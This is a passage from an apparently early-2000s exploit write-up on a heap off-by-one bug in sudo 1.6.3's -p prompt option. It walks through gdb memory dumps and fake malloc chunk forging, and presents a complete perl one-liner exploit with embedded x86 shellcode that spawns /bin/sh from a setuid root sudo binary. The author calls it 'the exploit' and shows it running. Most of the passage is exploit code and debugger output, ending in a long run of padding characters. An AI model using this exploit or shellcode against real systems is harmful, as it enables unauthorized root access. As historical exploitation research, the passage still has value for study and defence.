0x8060558: 0xbffffb62 0x6c000021 0x6c61636f 0x74736f68 0x8060568: 0x61636f6c 0x736f686c 0x61616174 0x61616161 0x8060578: 0x25616161 0x00000000 0x4018d168 0x4018d168 0x8060588: 0xbffffe1c 0xbffffe48 0xbffffe5c 0xbffffe67 (gdb) Ok, perfect. The intelligent reader sees how the null byte plastered the size area of that chunk. But look what gets placed right before it, yea, you know it, '%'. I wont even show you the rest, it still makes me ill. But I like the abuse, here is the seg. Program received signal SIGSEGV, Segmentation fault. 0x400dbb2d in chunk_free (ar_ptr=0x4018d160, p=0xe2a4a417) at malloc.c:3225 3225 in malloc.c 'Avg Heap Addy Value' - 0x25616161 = guess what ??? 0x08060558 - 0x25616161 = 0xe2a4a3f7 The power of estimation. The off by six! technique. This i dreamed up lying in bed most likely. But soon you realize that '0x25' is almost as useless incremented forward by one byte than before. Easier to show with gdb. [root@localhost sudo-1.6.3]# ps auxwww | grep sudo ; gdb sudo root 6697 0.5 0.2 1692 660 pts/7 S 22:59 0:00 ./sudo -p h%haaaaaaaaaaa% A root 6699 0.0 0.2 1700 592 pts/8 S 22:59 0:00 grep sudo GNU gdb Red Hat Linux 7.x (5.0rh-15) (MI_OUT) (gdb) attach 6697 Attaching to program: /home/fc/sudo/sudo-1.6.3/sudo, process 6697 Loaded symbols for /lib/libcrypt.so.1 Loaded symbols for /lib/libc.so.6 Loaded symbols for /lib/ld-linux.so.2 Loaded symbols for /lib/libnss_files.so.2 0x40112d31 in __libc_nanosleep () from /lib/libc.so.6 (gdb) break strcpy Breakpoint 1 at 0x400e0f2a: file ../sysdeps/generic/strcpy.c, line 34. (gdb) cont Continuing. Breakpoint 1, strcpy (dest=0x806055f "", src=0x805dc90 "localhost") at ../sysdeps/generic/strcpy.c:34 34 ../sysdeps/generic/strcpy.c: No such file or directory. in ../sysdeps/generic/strcpy.c (gdb) x/16x 0x8060558 0x8060558: 0xbffffb62 0x00000021 0x4018d1c8 0x4018d1c8 0x8060568: 0x6475732f 0x63662f6f 0xbffffbe4 0xbffffda7 0x8060578: 0xbffffdc6 0x00000049 0x4018d168 0x4018d168 0x8060588: 0xbffffe1c 0xbffffe48 0xbffffe5c 0xbffffe67 (gdb) break chunk_alloc Breakpoint 2 at 0x400daf01: file malloc.c, line 2860. (gdb) cont Continuing. Breakpoint 1, strcpy (dest=0x8060568 "%sudo/fcäûÿ¿§ýÿ¿Æýÿ¿I", src=0x805dc90 "localhost") at ../sysdeps/generic/strcpy.c:34 34 in ../sysdeps/generic/strcpy.c (gdb) Continuing. Breakpoint 2, chunk_alloc (ar_ptr=0x40068ec0, nb=3221222848) at malloc.c:2860 2860 malloc.c: No such file or directory. in malloc.c (gdb) x/16x 0x8060558 0x8060558: 0xbffffb62 0x6c000021 0x6c61636f 0x74736f68 0x8060568: 0x61636f6c 0x736f686c 0x61616174 0x61616161 0x8060578: 0x61616161 0x00000025 0x4018d168 0x4018d168 0x8060588: 0xbffffe1c 0xbffffe48 0xbffffe5c 0xbffffe67 (gdb) Well, off by six my ass. I can tell you what this does do, ruin at some point the 8 byte alignment the heap has by 4 bytes. And what use is that? I could not find any even though i thought about it a long time and still do. I just couldnt manipulate it correctly. I would each time increment my string by 4 bytes hoping it would land somewhere among all those small/medium sized chunks in a favorable position. But no lub. Off by seven? Nah, I decided to take a break at this point, catch up on some sleep, and think. :> II. Discussion of strategies At this point I would like to state that your username and/or hostname is very critical to this bug. I have seen usernames of varying length. From one byte to the ridiculous. Those are ussually the usernames that tie in with a long domain name. If you ever saw a lot of passwd files you know what I mean. Now the hostname is the other half of the pie. It is the same for all the users on the box locally, and it also varies in length. I have seen anywhere from ... well you get the picture. I went with border line lame, in my opinion, to me normal is localhost (9 bytes), I used double that. Yes, 18 bytes, eurocomptonmachine . Yea i know, why would someone pay 8.99 to have that for a year? But I am going with it. 18 bytes... hm. At this point in time i was no closer to success, but in the back of my mind I knew if I had a larger username or hostname it would be a huge advantage. So I changed my hostname to eurolamewhateva and started over. Right away I noticed this length of username would cause an instant segmentation fault at the next malloc. I was disapointed at first until I thought let me increase the size until it does not seg. This means I am either overflowing into nothing important or sudo is finding the heap space it needs below my huge buffer and is unaffected. What I am basically doing is pushing that '%' and the null byte past the 16 byte mark. Which is the smallest possible fake free chunk. A problem popped into my head though, fc, you cant go 'backwards', the null byte in the string problem with previous size chunk area... And since i made such a large chunk, nothing is in front of it... a shitload of 0's, or even worse out of bounds. I could taste it. I just needed to think a bit. So logic dictates i will have to use -1 (0xffffffff) for the previous size area of my fake chunk. Cant go backwards, dont wish to go forwards, I took the best possible case. -1. :> III. Exploiting this contrived example One ascii diagram coming up! sudo -p h%h%h%h%h< 11188 bytes of crap >< 50 bytes of / < 9 bytes of crap >< 17 bytes that is craftily designed >% < 18000 bytes of crap with a space every 3000 bytes > This also might help. ./sudo `perl -e 'print "-p h%h%h%h%h" . "A"x11188 . "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b" "\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40" "\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh" . "AAAAAAAAA" . "\xff\xff\xff\xff\x18\xeb\xff\xff\xff\xb4\xb6\x05\x08\xa1\xdc\x06\x08%"'` `perl -e 'print "a"x3000'` `perl -e 'print "a"x3000'` `perl -e 'print "a"x3000'` `perl -e 'print "a"x3000'` `perl -e 'print "a"x3000'` `perl -e 'print "a"x3000'` Btw, that is the exploit. I really dont know why people bother 'coding' something up. The interesting thing about this is the minimum technique. To use 0xffffffff and craft your fake chunk shifted by one byte. Look at it like this, in two phases. PHASE I Breakpoint 1, chunk_free (ar_ptr=0x4018d160, p=0x806dd18) at malloc.c:3166 3166 in malloc.c (gdb) x/12x 0x806dd08 0x806dd08: 0x6e69622f 0x4168732f 0x41414141 0x41414141 0x806dd18: 0xffffffff 0xffffeb08 0x05b6b4ff 0x06dca108 0x806dd28: 0x00002508 0x00000000 0x00000000 0x00000000 PHASE II (gdb) bt #0 chunk_free (ar_ptr=0x4018d160, p=0x806dd19) at malloc.c:3249 (gdb) x/12x 0x806dd09 0x806dd09: 0x2f6e6962 0x41416873 0x41414141 0xff414141 0x806dd19: 0x08ffffff 0xffffffeb 0x0805b6b4 0x0806dca1 0x806dd29: 0x00000025 0x00000000 0x00000000 0x00000000 Pretty fucking cool. Ask me, not much else to explain. Time to show off a bit. [fc@eurocomptonmachine fc]$ cd sudo/sudo-1.6.3 [fc@eurocomptonmachine sudo-1.6.3]$ ls -al sudo -rwsr-xr-x 1 root root 253676 Jul 14 21:09 sudo [fc@eurocomptonmachine sudo-1.6.3]$ uname -a Linux eurocomptonmachine 2.4.7-10 #1 Thu Sep 6 17:21:28 EDT 2001 i586 unknown [fc@eurocomptonmachine sudo-1.6.3]$ ./sudo `perl -e 'print "-p h%h%h%h%h" . "A"x11188 . "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b" . "\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40" . "\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh" . "AAAAAAAAA" . "\xff\xff\xff\xff\x18\xeb\xff\xff\xff\xb4\xb6\x05\x08\xa1\xdc\x06\x08%"'` `perl -e 'print "a"x3000'` `perl -e 'print "a"x3000'` `perl -e 'print "a"x3000'` `perl -e 'print "a"x3000'` `perl -e 'print "a"x3000'` `perl -e 'print "a"x3000'` urocomptonmachineeurocomptonmachineeurocomptonmachineeurocomptonmachineeurocomptonmachineAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA